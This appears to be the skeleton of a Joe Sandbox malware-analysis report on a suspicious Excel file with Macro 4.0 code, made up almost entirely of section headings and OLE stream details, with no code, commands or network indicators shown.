Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "c527325d_by_Libranalysis.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 271852

General

Macro 4.0 Code

Function 002C3450, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
windowtimesleepCOMMON